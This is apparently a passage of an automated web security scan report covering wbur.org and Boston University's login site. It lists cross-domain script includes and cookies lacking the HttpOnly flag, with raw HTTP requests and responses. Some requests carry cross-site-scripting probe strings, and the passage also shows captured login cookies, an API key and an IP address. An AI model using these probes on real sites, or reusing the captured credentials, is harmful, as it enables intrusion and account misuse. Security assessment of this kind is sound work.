<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.71. http://www.wbur.org/programs/talk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /programs/talk

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /programs/talk HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:38 GMT
Connection: close
Content-Length: 45021


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.72. http://www.wbur.org/programs/wait-wait  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /programs/wait-wait

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /programs/wait-wait HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:40 GMT
Connection: close
Content-Length: 40141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.73. http://www.wbur.org/programs/wesat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /programs/wesat

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /programs/wesat HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:39 GMT
Connection: close
Content-Length: 49788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.74. http://www.wbur.org/programs/wesun  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /programs/wesun

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /programs/wesun HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:41 GMT
Connection: close
Content-Length: 47099


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.75. http://www.wbur.org/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:44 GMT
Connection: close
Content-Length: 34062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.76. http://www.wbur.org/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /support

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:31 GMT
Connection: close
Content-Length: 35539


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.77. http://www.wbur.org/support/newsmaker  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /support/newsmaker

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/newsmaker HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:34 GMT
Connection: close
Content-Length: 46173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.78. http://www.wbur.org/support/upcoming-events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /support/upcoming-events

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/upcoming-events HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:33 GMT
Connection: close
Content-Length: 42302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.79. http://www.wbur.org/support/volunteer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /support/volunteer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/volunteer HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:34 GMT
Connection: close
Content-Length: 52965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.80. http://www.wbur.org/traffic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /traffic

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /traffic HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:57 GMT
Connection: close
Content-Length: 51214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</script>
   <script src="http://maps.google.com/maps?file=api&amp;v=2.x&amp;key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.81. http://www.wbur.org/underwriting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /underwriting

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /underwriting HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:30 GMT
Connection: close
Content-Length: 37318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.82. http://www.wbur.org/updates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /updates

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /updates HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:35 GMT
Connection: close
Content-Length: 32197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.83. http://www.wbur.org/weather  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /weather

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /weather HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:56 GMT
Connection: close
Content-Length: 35017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.84. http://www.wbur.org/wp-content/plugins/disqus-comment-system/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /wp-content/plugins/disqus-comment-system/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/plugins/disqus-comment-system/xd_receiver.htm HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 26 Jul 2011 16:13:16 GMT
Accept-Ranges: bytes
ETag: "fa4a2dedae4bcc1:0",""
Server: Microsoft-IIS/7.0
Date: Wed, 05 Oct 2011 18:35:44 GMT
Connection: close
Content-Length: 297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <body> <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

9. Cookie without HttpOnly flag set  previous  next
There are 48 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



9.1. https://weblogin.bu.edu//web@login3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   //web@login3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //web@login3?jsv=1.5p&br=un&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:03 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYUwrxHDsAAEIXd9Q
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:48:03 GMT
Set-Cookie: wl4cap=1317836883%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYUwrxHDsAAE4ID5sAAAAF
X-BU-Duration: D=167725
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2729

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...

9.2. https://weblogin.bu.edu/accounts/bulogin-forgotaccount  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/bulogin-forgotaccount

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/bulogin-forgotaccount?template_extension=forgot&_last_name=xss&_email_address=xss HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 05 Oct 2011 17:50:12 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=iso-8859-1
X-BU-Main-Uniqueid: ToyY1ArxHDsAAFj0ixgAAABE
X-BU-Duration: D=195964
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 524

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>500 Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error</H1>
The server encountered an internal error or
miscon
...[SNIP]...

9.3. https://weblogin.bu.edu/accounts/content/js/main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/content/js/main.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/content/js/main.js HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:56 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 06 Oct 2009 20:48:07 GMT
ETag: "4e4d-421-4acbad07"
Accept-Ranges: bytes
Content-Length: 1057
Content-Type: application/x-javascript
X-BU-Main-Uniqueid: ToyYwwrxHDsAAFhwPPQAAAA1
X-BU-Duration: D=1058357
X-BU-Backend: (null) (null)
Connection: close

$(document).ready(function() {
// Edit this to make the default end date be "n" months
// ahead of whatever the user enters for the start date:
//
var DEFAULT_END_DATE_MONTHS = 1;


...[SNIP]...

9.4. https://weblogin.bu.edu/accounts/forgot  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/forgot

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/forgot HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:55 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Expires: Tue, 04 Oct 2011 17:49:56 GMT
pragma: no-cache
cache-control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToyYwwrxHDsAAFhRhSAAAAAf
X-BU-Duration: D=1537718
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 6527


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>
[1] BU Accounts | Identify Forgot
</title>
<meta http-equiv="Content-Type" content="text/html;">
<!--Fireworks M
...[SNIP]...

9.5. https://weblogin.bu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /favicon.ico

Issue detail

